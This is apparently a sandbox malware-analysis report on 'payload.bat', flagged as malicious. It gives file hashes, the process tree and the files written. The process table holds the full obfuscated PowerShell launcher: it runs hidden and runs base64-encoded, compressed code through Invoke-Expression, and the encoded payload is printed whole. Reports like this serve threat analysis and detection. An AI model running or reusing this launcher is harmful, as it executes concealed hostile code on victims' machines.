File name: | payload.bat |
Full analysis: | https://app.any.run/tasks/85768cdc-f828-4c4e-a26f-a4ddb77387f0 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 13:07:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines |
MD5: | BC2070FA5E151D883B692CA291B076FA |
SHA1: | EAED67E685FDAAEC4D5DF8CB6ED6E716EA5B1798 |
SHA256: | 6C57EC191B8AA093C556733A3E4E9C82DA49E2C88762CBEC59476C86A80D0F96 |
SSDEEP: | 48:DM7B/Xff7TsdnEEboVUS2O947DY3a55VOhAPff7TsdnEEboVUS2O947DY3a55VO7:Db9bE9J47DrHkhl9bE9J47DrHkh1 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2872 | cmd /c ""C:\Users\admin\AppData\Local\Temp\payload.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3672 | powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRRc9pGEH7nV+xorjPSGMkCXIrReCYOjhO3wXENsdMyTOeQFnTx6U4+nQyY8N+7AhWT177otKu9/b7d/VbsGS7gndOYXEl5k+XaWNd5QqNQdtpBIqXjTSEvZ1LEUFhu6cCVpe9wo+ydNfAgjC25vJRSx27tk/llkhgsiiaUQllIliPxirUx38dSKq3G6/zNfWe0xdh60f/mMjDILY5TOpI3Lnv70lojZqXFI1KWx097Zodg8hl7YH9w33HDMySsw+UdFpVwLfniOHKPdpNQGc67hjXrDUuow87l+8HVh+uPn25+/+Pz8PbL3Z/3o/HXh8dvf/3NZ3GC80Uqvj/JTOn82RS2fFmu1q9hq905+7X7W+/cCcZ6kHJzaQxfu15jXqq4QofYZS/eBgzakvrguhNiN5lOgb38fAN+wBB5URr0v8y+U5vBH5WZF9ADfoFw1QpD8PEZztve9i27hQ2bV+ydqBUEnR9zTcXFqa93KejbyQWwZOIu0PqGq0Rn4Gd8JTLKypLgM6qFTb3pNqr5sXl0lB1hA7nRMbUaNhNeEZ2yFcHR4wTYP9sIUCVEYUXsC1JDjQsbV+HyP+N+h+sFirTgetvtEcBiA8QYXCYuwogJ8KWF7hm9nZx4G5YSko3YUwWYEAJGAHWBdEWCIL5PFFdUAWnFSEYg5uBSzwvPg0PXKYJga8M5f/n21aEyJ7dogxGaFxHjnaaxDLniCzTTfr/yohmgsWIuaBPwgUuR7OQ04FLOSJaEuWHWlLiNWEbGLRVcD260LixmQZX+EWcDKVDZqMGy4BMJD00RkHxdpyzQ+ISnrNMEZ6hfhZT89CwIib/OcgKbSap4OLr5AN2gFcGjoD4uC7gde44XMUWgiwgm79cWd4LKqzZkwZVeKql5csUtd53U2rzon562zttBq9sLWi3K1en0e2EvPGXKAa/BNF0kSn617CQPzGZornAulNgNiT2Df0vLBQ4x6LQd8BVZRc5jhJ3nuh5nAX7Oi8Kmpmyw1QXT/f5PP5+wyfJacs1w1QnDkI6z0IsmdcfuS2VFhgHtKhqd17MpgiE3RcolDWag87XL8iaETZjsV3rqshWtEhmdtut5TTiAVKXRleN/DiE22apZHWG1crq0viol6Wb3X/FHEjGnzcNYk7B73bMw3NL843Sz/Rc=\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X9BQ2F1XC522Y2NYTWE5.temp | — | |
MD5:— | SHA256:— | |||
3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20d630.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3672 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |